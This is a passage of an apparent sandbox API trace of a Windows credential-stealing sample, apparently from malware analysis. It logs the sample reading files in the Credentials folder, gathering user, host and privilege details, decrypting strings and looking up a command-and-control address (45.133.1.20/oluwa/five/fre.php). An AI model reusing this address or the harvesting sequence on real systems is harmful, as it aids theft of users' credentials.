(HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6bae98 [0132.921] GetProcessHeap () returned 0x6a0000 [0132.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.922] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6acfa0 [0132.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.924] StrStrW (lpFirst=".", lpSrch="Windows") returned 0x0 [0132.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.926] StrStrW (lpFirst=".", lpSrch="Program Files") returned 0x0 [0132.927] FindNextFileW (in: hFindFile=0x6acfa0, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.978] StrStrW (lpFirst="..", lpSrch="Windows") returned 0x0 [0132.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.979] StrStrW (lpFirst="..", lpSrch="Program Files") returned 0x0 [0132.979] FindNextFileW (in: hFindFile=0x6acfa0, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0132.979] FindNextFileW (in: hFindFile=0x6acfa0, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0132.980] FindClose (in: hFindFile=0x6acfa0 | out: hFindFile=0x6acfa0) returned 1 [0132.980] GetProcessHeap () returned 0x6a0000 [0132.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0132.980] GetProcessHeap () returned 0x6a0000 [0132.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bf370 [0132.981] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.982] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned 59 [0132.982] GetProcessHeap () returned 0x6a0000 [0132.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7a) returned 0x6bae98 [0132.982] GetProcessHeap () returned 0x6a0000 [0132.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.983] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\*"), lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ad4a0 [0132.983] FindNextFileW (in: hFindFile=0x6ad4a0, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.984] FindNextFileW (in: hFindFile=0x6ad4a0, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0132.984] GetProcessHeap () returned 0x6a0000 [0132.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4a) returned 0x6bf370 [0132.984] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.985] wvsprintfW (in: param_1=0x6bf370, param_2="%s\\%s", arglist=0x19f8e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D") returned 90 [0132.985] GetProcessHeap () returned 0x6a0000 [0132.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb8) returned 0x6baf20 [0132.985] GetProcessHeap () returned 0x6a0000 [0132.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0132.987] StrStrW (lpFirst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D", lpSrch="_dec") returned 0x0 [0132.987] GetProcessHeap () returned 0x6a0000 [0132.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f4c) returned 0x6bf370 [0132.987] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0132.988] wvsprintfW (in: param_1=0x6bf370, param_2="%s_dec", arglist=0x19f670 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D_dec") returned 94 [0132.988] GetProcessHeap () returned 0x6a0000 [0132.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x6bc5d0 [0132.988] GetProcessHeap () returned 0x6a0000 [0132.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 [0132.989] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\dfbe70a7e5cc19a398ebf1b96859ce5d"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0132.990] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x19f654 | out: lpFileSizeHigh=0x19f654*=0x0) returned 0x2ac0 [0132.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2ac0, flAllocationType=0x1000, flProtect=0x4) returned 0x5b0000 [0132.991] ReadFile (in: hFile=0x24c, lpBuffer=0x5b0000, nNumberOfBytesToRead=0x2ac0, lpNumberOfBytesRead=0x19f650, lpOverlapped=0x0 | out: lpBuffer=0x5b0000*, lpNumberOfBytesRead=0x19f650*=0x2ac0, lpOverlapped=0x0) returned 1 [0132.993] CloseHandle (hObject=0x24c) returned 1 [0133.004] VirtualFree (lpAddress=0x5b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.005] GetProcessHeap () returned 0x6a0000 [0133.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc5d0 | out: hHeap=0x6a0000) returned 1 [0133.005] GetProcessHeap () returned 0x6a0000 [0133.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baf20 | out: hHeap=0x6a0000) returned 1 [0133.006] FindNextFileW (in: hFindFile=0x6ad4a0, lpFindFileData=0x19f8fc | out: lpFindFileData=0x19f8fc*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x5871986a, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x2ac0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0133.006] FindClose (in: hFindFile=0x6ad4a0 | out: hFindFile=0x6ad4a0) returned 1 [0133.007] GetProcessHeap () returned 0x6a0000 [0133.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0133.007] GetProcessHeap () returned 0x6a0000 [0133.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7c60 | out: hHeap=0x6a0000) returned 1 [0133.007] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.lck" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.lck")) returned 1 [0133.009] GetProcessHeap () returned 0x6a0000 [0133.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8660 | out: hHeap=0x6a0000) returned 1 [0133.009] GetProcessHeap () returned 0x6a0000 [0133.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1388) returned 0x6bf370 [0133.009] GetProcessHeap () returned 0x6a0000 [0133.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6bead8 [0133.009] GetProcessHeap () returned 0x6a0000 [0133.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11c) returned 0x6bae98 [0133.010] RtlGetVersion (in: lpVersionInformation=0x6bae98 | out: lpVersionInformation=0x6bae98*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0133.010] GetProcessHeap () returned 0x6a0000 [0133.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bae98 | out: hHeap=0x6a0000) returned 1 [0133.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fb18 | out: lpSystemTimeAsFileTime=0x19fb18*(dwLowDateTime=0x3e71aa6d, dwHighDateTime=0x1d8604e)) [0133.011] GetProcessHeap () returned 0x6a0000 [0133.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7) returned 0x6ba9c0 [0133.011] GetProcessHeap () returned 0x6a0000 [0133.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0133.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.050] GetUserNameW (in: lpBuffer=0x6bd1c8, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0133.051] GetProcessHeap () returned 0x6a0000 [0133.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0133.051] GetProcessHeap () returned 0x6a0000 [0133.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0133.052] GetComputerNameW (in: lpBuffer=0x6bd1c8, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0133.052] GetProcessHeap () returned 0x6a0000 [0133.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0133.053] GetCurrentThread () returned 0xfffffffe [0133.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0133.055] GetLastError () returned 0x3f0 [0133.055] GetCurrentProcess () returned 0xffffffff [0133.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x248) returned 1 [0133.057] GetProcessHeap () returned 0x6a0000 [0133.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bd1c8 [0133.057] GetProcessHeap () returned 0x6a0000 [0133.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6bb5c8 [0133.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.058] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0133.058] GetProcessHeap () returned 0x6a0000 [0133.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0133.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.060] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x1, TokenInformation=0x6b0af0, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x6b0af0, ReturnLength=0x19fb70) returned 1 [0133.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.061] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6b0af8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6bd1c8, cchName=0x19fb60, ReferencedDomainName=0x6bb5c8, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0133.063] GetProcessHeap () returned 0x6a0000 [0133.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f44) returned 0x6c0700 [0133.064] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0133.064] wvsprintfW (in: param_1=0x6c0700, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0133.064] GetProcessHeap () returned 0x6a0000 [0133.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb08 [0133.065] GetProcessHeap () returned 0x6a0000 [0133.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c0700 | out: hHeap=0x6a0000) returned 1 [0133.065] GetProcessHeap () returned 0x6a0000 [0133.065] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0133.066] CloseHandle (hObject=0x248) returned 1 [0133.066] GetProcessHeap () returned 0x6a0000 [0133.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x6a0000) returned 1 [0133.066] GetProcessHeap () returned 0x6a0000 [0133.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0133.066] GetProcessHeap () returned 0x6a0000 [0133.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb08 | out: hHeap=0x6a0000) returned 1 [0133.067] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0133.067] GetDesktopWindow () returned 0x10010 [0133.068] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0133.068] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0133.097] GetProcessHeap () returned 0x6a0000 [0133.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x6baa50 [0133.097] GetProcessHeap () returned 0x6a0000 [0133.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0133.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.098] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0133.099] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x74d00000 [0133.100] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserGetInfo") returned 0x6dc133a0 [0133.100] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x6b4c28*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xbb523, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0133.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.107] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x6beaa8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0133.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.107] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6beaa8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0133.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.109] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0133.109] GetProcessHeap () returned 0x6a0000 [0133.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4c70 [0133.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.110] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0133.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.117] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x6bae98) returned 1 [0133.194] GetProcessHeap () returned 0x6a0000 [0133.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0133.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.195] CryptImportKey (in: hProv=0x6bae98, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x6ad4a0) returned 1 [0133.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.196] CryptSetKeyParam (hKey=0x6ad4a0, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0133.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.211] CryptSetKeyParam (hKey=0x6ad4a0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0133.211] GetProcessHeap () returned 0x6a0000 [0133.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0133.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.213] CryptDecrypt (in: hKey=0x6ad4a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4c70, pdwDataLen=0x19f974 | out: pbData=0x6b4c70, pdwDataLen=0x19f974) returned 1 [0133.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.214] CryptDestroyKey (hKey=0x6ad4a0) returned 1 [0133.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0133.215] CryptReleaseContext (hProv=0x6bae98, dwFlags=0x0) returned 1 [0133.215] GetProcessHeap () returned 0x6a0000 [0133.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bd1c8 [0133.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0133.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0133.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0133.217] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0133.218] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0133.218] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0133.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0133.219] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0133.219] GetProcessHeap () returned 0x6a0000 [0133.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0133.219] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x0) returned 11001 [0134.389] GetProcessHeap () returned 0x6a0000 [0134.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0134.390] GetProcessHeap () returned 0x6a0000 [0134.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd1c8 | out: hHeap=0x6a0000) returned 1 [0134.390] GetProcessHeap () returned 0x6a0000 [0134.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4c70 | out: hHeap=0x6a0000) returned 1 [0134.391] GetProcessHeap () returned 0x6a0000 [0134.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0134.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.392] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0134.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.401] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x6bae98) returned 1 [0134.500] GetProcessHeap () returned 0x6a0000 [0134.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0134.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.518] CryptImportKey (in: hProv=0x6bae98, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x6ad020) returned 1 [0134.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.519] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0134.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.520] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0134.520] GetProcessHeap () returned 0x6a0000 [0134.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0134.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.522] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19f974 | out: pbData=0x6b49a0, pdwDataLen=0x19f974) returned 1 [0134.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.608] CryptDestroyKey (hKey=0x6ad020) returned 1 [0134.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0134.610] CryptReleaseContext (hProv=0x6bae98, dwFlags=0x0) returned 1 [0134.610] GetProcessHeap () returned 0x6a0000 [0134.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bd1c8 [0134.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0134.611] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0134.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0134.612] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0134.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0134.613] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0134.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0134.620] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0134.620] GetProcessHeap () returned 